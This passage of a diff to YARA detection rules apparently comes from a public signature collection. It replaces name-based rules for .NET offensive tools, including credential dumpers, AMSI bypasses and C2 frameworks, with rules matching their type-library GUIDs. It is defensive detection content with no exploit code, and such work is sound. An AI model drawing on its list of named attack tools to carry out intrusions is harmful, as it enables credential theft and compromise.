-		id = "97981569-fe94-5600-8319-946edb4265e7"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/b4rtik/ATPMiniDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L204-L217"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d4b9a8c5-e0d9-5c85-af81-05f6e0f52bff"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/SnaffCon/Snaffler"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2531-L2547"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7498ed5d11b9c3646ebd2d1330a239c43e9c5b270b1778871c2821a2fefb5137"
+		logic_hash = "13711b325cadf882be0aeb1073084193c73b9eec0f3a323d0cea9beeeb3d3cf5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "ATPMiniDump" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "2aa060b4-de88-4d2a-a26a-760c1cefec3e" ascii wide
+		$typelibguid0up = "2AA060B4-DE88-4D2A-A26A-760C1CEFEC3E" ascii wide
+		$typelibguid1lo = "b118802d-2e46-4e41-aac7-9ee890268f8b" ascii wide
+		$typelibguid1up = "B118802D-2E46-4E41-AAC7-9EE890268F8B" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_NET_NAME_Confuserex : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshares : FILE
 {
 	meta:
-		description = "Detects ConfuserEx packed file"
-		author = "Arnim Rupp"
-		id = "f1bda14e-c9fe-5341-8962-691a66233eb0"
-		date = "2021-01-22"
-		modified = "2021-01-25"
-		reference = "https://github.com/yck1509/ConfuserEx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L219-L234"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e96aa79b-1da2-5b0c-9ac2-b6e201e06ec6"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/djhohnstein/SharpShares/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2549-L2563"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "beecb7b66830a033e2048da246d320c1ffc5015b280b34fb61aee87c8a42fff3"
-		score = 40
+		logic_hash = "3ff3dd2c1facaeefcfd7f784c4dae15a66ff5ba1de33bb007dbc8cc91c38c29e"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "ConfuserEx" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "fe9fdde5-3f38-4f14-8c64-c3328c215cf2" ascii wide
+		$typelibguid0up = "FE9FDDE5-3F38-4F14-8C64-C3328C215CF2" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpbuster : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpedrchecker : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "d30c8ee5-88b9-53b5-b209-51f6f3b988cf"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/passthehashbrowns/SharpBuster"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L236-L249"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f7ff344e-f8ee-5c3a-bdd1-de3cae8e7dfb"
+		date = "2020-12-18"
+		modified = "2023-04-06"
+		reference = "https://github.com/PwnDexter/SharpEDRChecker"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2565-L2579"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cdc19e03f75f34e6349937c0bff313298fc9310f361eec7af022c450d083ad96"
+		logic_hash = "9da3ff753db6358029f1fdcb100bf6173d142096557c170ddcb3ac9b8c80b310"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "SharpBuster" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "bdfee233-3fed-42e5-aa64-492eb2ac7047" ascii wide
+		$typelibguid0up = "BDFEE233-3FED-42E5-AA64-492EB2AC7047" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Amsibypass : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcliphistory : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "26db14d8-1034-5bd1-a719-4756c832901d"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/0xB455/AmsiBypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L251-L269"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "89ca4717-a4ec-5371-8dc3-bdb9933384af"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/FSecureLABS/SharpClipHistory"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2581-L2595"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8fa4ba512b34a898c4564a8eac254b6a786d195b"
-		logic_hash = "f93b1014c7e26462fbbd3cd572cfa21a09c5da915a9a51d3e58a46a2b9b7cfe4"
+		logic_hash = "5c88179f7b32cc4300f7ed85472247f91d812e523d07f4a11dc4e4b34344be1d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s_name = "AmsiBypass" ascii wide
-		$s_compile = "AssemblyTitle" ascii wide
-		$fp1 = "Adaptive Threat Protection" wide
+		$typelibguid0lo = "1126d5b4-efc7-4b33-a594-b963f107fe82" ascii wide
+		$typelibguid0up = "1126D5B4-EFC7-4B33-A594-B963F107FE82" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $s* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Recon_AD : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpgpo_Remoteaccesspolicies : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "097de5cd-0cd4-59cc-a7b7-54cad8e6d230"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/outflanknl/Recon-AD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L271-L284"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "642c2672-2327-5a4a-af91-6e0559996908"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2597-L2611"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7bfafb2d3e85bb584bd02cb92457d22b07626f71d071c44a4aefbb5748045446"
+		logic_hash = "7d6f74ef8d34603502b26b60a1042dd531891088b9455f068bccaabaf12232b1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "Recon-AD" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "fbb1abcf-2b06-47a0-9311-17ba3d0f2a50" ascii wide
+		$typelibguid0up = "FBB1ABCF-2B06-47A0-9311-17BA3D0F2A50" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpwatchdogs : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Absinthe : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "5343be58-879a-5fe7-9036-ee6a22d85f22"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/RITRedteam/SharpWatchdogs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L286-L299"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8f25593b-b9d2-5807-b299-b039ecfd43a5"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/cameronhotchkies/Absinthe"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2613-L2627"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3b9410d7e502a5fd55e534d8fe79710d48cf65a0e9859bdd0fea6c8d32311df0"
+		logic_hash = "f6736024464a7b7115f8b66ff985a47107cbdd7d6260e56586ade467b3ca6c2a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "SharpWatchdogs" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "9936ae73-fb4e-4c5e-a5fb-f8aaeb3b9bd6" ascii wide
+		$typelibguid0up = "9936AE73-FB4E-4C5E-A5FB-F8AAEB3B9BD6" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpcat : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Exploitremotingservice : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "a46be8d3-bf7b-5d86-b88b-33e6c8c152d8"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Cn33liz/SharpCat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L301-L314"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2f0b9635-2b2e-5825-baeb-69d7ae3791b1"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/tyranid/ExploitRemotingService"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2629-L2647"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b9e5946f8df1649e71abf014aa6579edbbc93a12ddcc56f8d85d97ae087c8711"
+		logic_hash = "08871e9edc8184ee487080a9d99735598a9f03e605db0a38e83f60a3cc15cbbe"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "SharpCat" ascii wide fullword
-		$compile = "AssemblyTitle" ascii wide fullword
+		$typelibguid0lo = "fd17ae38-2fd3-405f-b85b-e9d14e8e8261" ascii wide
+		$typelibguid0up = "FD17AE38-2FD3-405F-B85B-E9D14E8E8261" ascii wide
+		$typelibguid1lo = "1850b9bb-4a23-4d74-96b8-58f274674566" ascii wide
+		$typelibguid1up = "1850B9BB-4A23-4D74-96B8-58F274674566" ascii wide
+		$typelibguid2lo = "297cbca1-efa3-4f2a-8d5f-e1faf02ba587" ascii wide
+		$typelibguid2up = "297CBCA1-EFA3-4F2A-8D5F-E1FAF02BA587" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_K8Tools : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Xploit : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "b30fc856-073d-542f-b222-a957322732c2"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/k8gege/K8tools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L316-L329"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "11ba6c14-06b6-5d9f-ac69-08ae506877e7"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/shargon/Xploit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2649-L2683"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "370cab83917bbc76f7f3a1b7793773ddf139879880e55efe59c72a07b34120f1"
+		logic_hash = "b049d1fe26677b8c1a5bfcb46bfa2b35073f2b4bba02551b490a527df81f145b"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "K8tools" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "4545cfde-9ee5-4f1b-b966-d128af0b9a6e" ascii wide
+		$typelibguid0up = "4545CFDE-9EE5-4F1B-B966-D128AF0B9A6E" ascii wide
+		$typelibguid1lo = "33849d2b-3be8-41e8-a1e2-614c94c4533c" ascii wide
+		$typelibguid1up = "33849D2B-3BE8-41E8-A1E2-614C94C4533C" ascii wide
+		$typelibguid2lo = "c2dc73cc-a959-4965-8499-a9e1720e594b" ascii wide
+		$typelibguid2up = "C2DC73CC-A959-4965-8499-A9E1720E594B" ascii wide
+		$typelibguid3lo = "77059fa1-4b7d-4406-bc1a-cb261086f915" ascii wide
+		$typelibguid3up = "77059FA1-4B7D-4406-BC1A-CB261086F915" ascii wide
+		$typelibguid4lo = "a4a04c4d-5490-4309-9c90-351e5e5fd6d1" ascii wide
+		$typelibguid4up = "A4A04C4D-5490-4309-9C90-351E5E5FD6D1" ascii wide
+		$typelibguid5lo = "ca64f918-3296-4b7d-9ce6-b98389896765" ascii wide
+		$typelibguid5up = "CA64F918-3296-4B7D-9CE6-B98389896765" ascii wide
+		$typelibguid6lo = "10fe32a0-d791-47b2-8530-0b19d91434f7" ascii wide
+		$typelibguid6up = "10FE32A0-D791-47B2-8530-0B19D91434F7" ascii wide
+		$typelibguid7lo = "679bba57-3063-4f17-b491-4f0a730d6b02" ascii wide
+		$typelibguid7up = "679BBA57-3063-4F17-B491-4F0A730D6B02" ascii wide
+		$typelibguid8lo = "0981e164-5930-4ba0-983c-1cf679e5033f" ascii wide
+		$typelibguid8up = "0981E164-5930-4BA0-983C-1CF679E5033F" ascii wide
+		$typelibguid9lo = "2a844ca2-5d6c-45b5-963b-7dca1140e16f" ascii wide
+		$typelibguid9up = "2A844CA2-5D6C-45B5-963B-7DCA1140E16F" ascii wide
+		$typelibguid10lo = "7d75ca11-8745-4382-b3eb-c41416dbc48c" ascii wide
+		$typelibguid10up = "7D75CA11-8745-4382-B3EB-C41416DBC48C" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Httpsbeaconshell : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Poc : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "3bd7234b-a23e-5818-aed1-52d42023943b"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/limbenjamin/HTTPSBeaconShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L331-L344"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5669bc1a-b32e-5ae7-bf94-8ed2a124c765"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/thezdi/PoC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2685-L2699"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6a0d7e1f796ae6cefa297978c743916a08b2406c37fa2c1f3f697a17cb032517"
+		logic_hash = "938b553912d069969326bc970d94c23749af3ef28a0b5ce2c49d9de54358f9bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "HTTPSBeaconShell" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "89f9d411-e273-41bb-8711-209fd251ca88" ascii wide
+		$typelibguid0up = "89F9D411-E273-41BB-8711-209FD251CA88" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Ghostpack_Compiledbinaries : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpgpoabuse : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "7cc81894-8c01-5a17-a7ed-1cb4cf1e2d53"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/r3motecontrol/Ghostpack-CompiledBinaries"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L346-L359"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ea27044f-69be-5db7-8d77-28dafb18c7e5"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/FSecureLABS/SharpGPOAbuse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2701-L2715"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a8e90f07b7d1ec309e51e3606169a05c4bb2b2aa7e31ca26b21f927d648c13cd"
+		logic_hash = "e3539bb9bdf7a9986e8fcfc725233363285e1dfe3de254b6979643abfe7944a5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "Ghostpack-CompiledBinaries" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "4f495784-b443-4838-9fa6-9149293af785" ascii wide
+		$typelibguid0up = "4F495784-B443-4838-9FA6-9149293AF785" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Metasploit_Sharp : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Watson : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "b425f241-4887-5368-b42b-3fbbd3b769c6"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/VolatileMindsLLC/metasploit-sharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L361-L374"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "6dc7bb08-0b34-50a0-8ae8-02d96d66a334"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/rasta-mouse/Watson"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2717-L2731"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7a1c4e077e197a5cdca8cb12713abb3fa86a3f6ea8e8f2f632c9c8e42d829acc"
+		logic_hash = "cc7134a974b11b677e368f4f01ec534578bcd970282dc2c8b7f4852cb028514a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "metasploit-sharp" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "49ad5f38-9e37-4967-9e84-fe19c7434ed7" ascii wide
+		$typelibguid0up = "49AD5F38-9E37-4967-9E84-FE19C7434ED7" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Trevorc2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Standin : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "d1634a0d-6964-5886-b836-85c3ce6b8a17"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/trustedsec/trevorc2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L376-L389"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2af3c28a-ce5d-5dea-9abe-ff54b180049e"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/FuzzySecurity/StandIn"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2733-L2747"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c1d56ef865e6619d9d0deff90b154c63cc3036a8521d3952819e45f51fca9fea"
+		logic_hash = "105be83eb5db667b9f27f2a514e0d04748ca006ef64aa01b9f643c227e7f1639"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "trevorc2" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "01c142ba-7af1-48d6-b185-81147a2f7db7" ascii wide
+		$typelibguid0up = "01C142BA-7AF1-48D6-B185-81147A2F7DB7" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_DNS2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Azure_Password_Harvesting : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "0fa01355-de57-573e-9056-0b7a5d24572d"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/NativePayload_DNS2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L391-L404"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "681cf9da-d664-5402-b7ac-eb2cfad85da9"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/guardicore/azure_password_harvesting"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2749-L2763"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "765e6117f69fb58e5e71544badc8135b2ec641a74cc0489a7c79308ca2837bd7"
+		logic_hash = "4b42d3318af410952f96ede0959363f33e75ce0644c58c1de85165e0acbbfcdd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "NativePayload_DNS2" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "7ad1ff2d-32ac-4c54-b615-9bb164160dac" ascii wide
+		$typelibguid0up = "7AD1FF2D-32AC-4C54-B615-9BB164160DAC" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Aggressiveproxy : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Powerops : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "e2d3c4e2-404b-59f8-b3d0-a7cef4dfd0ff"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/EncodeGroup/AggressiveProxy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L406-L419"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3ef9f099-13c9-5b6f-8615-232240530078"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/fdiskyou/PowerOPS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2765-L2779"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "702b0cc858cb1687962ac403a730e5f778bf51fc91627c50103e4299f4a3ca5f"
